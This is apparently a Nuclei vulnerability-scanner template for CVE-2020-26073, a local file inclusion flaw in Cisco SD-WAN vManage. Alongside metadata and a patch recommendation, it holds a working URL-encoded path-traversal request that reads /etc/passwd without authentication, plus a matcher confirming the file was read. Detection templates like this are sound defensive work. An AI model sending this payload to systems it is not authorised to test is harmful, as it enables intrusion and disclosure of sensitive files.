37 lines
1.2 KiB
YAML
37 lines
1.2 KiB
YAML
id: CVE-2020-26073
|
|
|
|
info:
|
|
name: Cisco SD-WAN vManage Software - Local File Inclusion
|
|
author: madrobot
|
|
severity: high
|
|
description: |
|
|
Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
|
|
remediation: |
|
|
Apply the latest security patches provided by Cisco to fix the vulnerability.
|
|
reference:
|
|
- https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
|
|
classification:
|
|
cve-id: CVE-2020-26073
|
|
metadata:
|
|
max-request: 1
|
|
tags: cve,cve2020,cisco,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|
|
|
|
# digest: 4b0a0048304602210093b5325073f2c8cc6afd564686b47d297156183c850c1bd644f37e142ab542cf022100df13c84724cfdc148ed72097e25053bc533f89889ef1eecf91d114ba505f5673:922c64590222798bb761d5b6d8e72950
|